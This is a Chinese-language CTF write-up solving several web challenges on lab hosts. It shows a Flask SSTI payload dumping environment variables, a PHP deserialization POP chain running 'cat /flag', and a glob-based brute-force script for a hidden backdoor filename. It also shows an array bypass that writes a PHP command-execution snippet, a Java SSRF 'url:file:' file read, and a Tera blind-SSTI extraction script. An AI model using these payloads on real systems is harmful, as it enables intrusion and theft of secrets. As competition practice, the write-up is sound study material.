Web-Escape

这题直接改的别人的题,链接:https://github.com/noflowpls101/CTFS_2023/blob/a78e5f759304a01415cb6b1f5113c2384b353e7f/ImaginaryCTF_2023/Web_Helpful/solve.py
,没给salt,16位爆破太长了,直接注入找环境变量
主要是信息收集吧 https://imaginaryctf.org/ArchivedChallenges/39
image.png

http://172.10.0.5:10000/?username={passhash.__str__.__globals__[app].wsgi_app.__globals__[os].environ}&password=anything
注入
Pasted image 20231104173536.png

Web-web1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
 <?php
show_source(__FILE__);
error_reporting(0);
class Hacker{
    private $exp;
    private $cmd;

    public  function __toString()
    {
        call_user_func('system', "cat /flag");
    }
}

class A
{
    public $hacker;
    public  function __toString()
    {
        echo $this->hacker->name;
        return "";
    }
}
class C
{
    public $finish;
    public function __get($value)
    {
        $this->finish->hacker();
        echo 'nonono';
    }
}
class E
{
    public $hacker;

    public  function __invoke($parms1)
    {   
        echo $parms1;
        $this->hacker->welcome();
    }
}

class H
{
    public $username="admin";
    public function __destruct()
    {
        $this->welcome();

    }
    public  function welcome()
    {
        echo "welcome~ ".$this->username;
    }
}

class K
{
    public $func;
    public function __call($method,$args)
    {
        call_user_func($this->func,'welcome');
    }
}

class R
{
    private $method;
    private $args;

    public  function welcome()
    {
        if ($this->key === true && $this->finish1->name) {
            if ($this->finish->finish) {
                call_user_func_array($this->method,$this->args);
            }
        }
    }
}

function nonono($a){
    $filter = "/system|exec|passthru|shell_exec|popen|proc_open|pcntl_exec|system|eval|flag/i";
    return preg_replace($filter,'',$a);
}

$a = $_POST["pop"];
if (isset($a)){
    unserialize(nonono($a));
}
?>

牛魔题,直接秒了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
<?php
show_source(__FILE__);
error_reporting(0);
class Hacker{
    private $exp;
    private $cmd;


}



class H
{
    public $username;
    public function __construct(){
        $this->username=new Hacker();
    }

}
echo serialize(new H());

?>

Pasted image 20231104182205.png

Web-web2

源代码提示:

1
<!-- backdoor_[a-f0-9]{16}.php -->

先爆文件名
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import string
url = "http://172.10.0.5/"

str = string.ascii_letters[:26]+"0123456789."

path = "backdoor_"

for i in range(0,50):
    for s in str:
        data = {
            "filename": f"glob:///var/www/html/{path+s}*",
        }
        r = requests.post(url, data)
        if "yesyesyes" in r.text:
            path += s
            print(i, path)
            break

/backdoor_00fbc51dcdf9eef767597fd26119a894.php

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
 <?php
highlight_file(__FILE__);
error_reporting(0);

if(isset($_GET['username'])){
    $sandbox = '/var/www/html/sandbox/'.md5("5050f6511ffb64e1914be4ca8b9d585c".$_GET['username']).'/';
    mkdir($sandbox);
    chdir($sandbox);
    
    if(isset($_GET['title'])&&isset($_GET['data'])){
        $data = $_GET['data'];
        $title= $_GET['title'];
        if (strlen($data)>5||strlen($title)>3){
            die("no!no!no!");
        }
        file_put_contents($sandbox.$title,$data);

        if (strlen(file_get_contents($title)) <= 10) {
            system('php '.$sandbox.$title);
        }
        else{
            system('rm '.$sandbox.$title);
            die("no!no!no!");
        }

    }
    else if (isset($_GET['reset'])) {
        system('/bin/rm -rf ' . $sandbox);
    }
}
?>

一开始以为是5字符串webshell构造,但是这里指定了system命令是php,所以不行
直接数组绕过长度限制
1
?username=jmx0hxq&title[]=1.php&data[]=<?= `cat /flag`?>

Pasted image 20231104182854.png

Web-HTTP

先dirsearch扫到/swagger-resources路由

里面有/v3/api-docs路由

提示/proxy/url可以传url,一看就是ssrf页面
还有ui页面: http://172.10.0.3:8080/swagger-ui/index.html

Pasted image 20231104180437.png

JAva ssrf 绕过 伪协议参考:
https://www.freebuf.com/articles/web/364113.html

  • url:file绕过协议限制
  • %23绕过扩展限制
    1
    /proxy/url?url=url:file:/flag%23html
    Pasted image 20231104180554.png

Tera


当时这个SSTI给我整麻了,我已经猜到它是盲注了,但是标题是Tera,好像是Rust引擎模板,于是去学习一下它的语法:
https://www.codenong.com/cs107111967/

可以看到里面有个matching内置函数,可以匹配正则表达式模式

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
import string
import requests

url = "http://172.10.0.3:8081/"


def test(flag):
    data = '{% set t="galf"|reverse %}{% set f=get_env(name=t,default="123") %}{% if f is matching("flag.*") %}1234{% endif %}'.replace('flag',flag)
    txt = requests.post(url,data).text
    if "1234" in txt:
        return True
    return False

s = string.hexdigits + "-+"
flag = "^fla.."
while True:
    for i in s:
        if i == "+":
            print(flag+'}')
            exit()
        if test(flag + i):
            flag += i
            print(flag)
            break

这里直接用reverse过滤器来绕过flag敏感字符串,通过环境变量回显来盲注flag

  • ^fla..表示fla开头随便后面接两个字符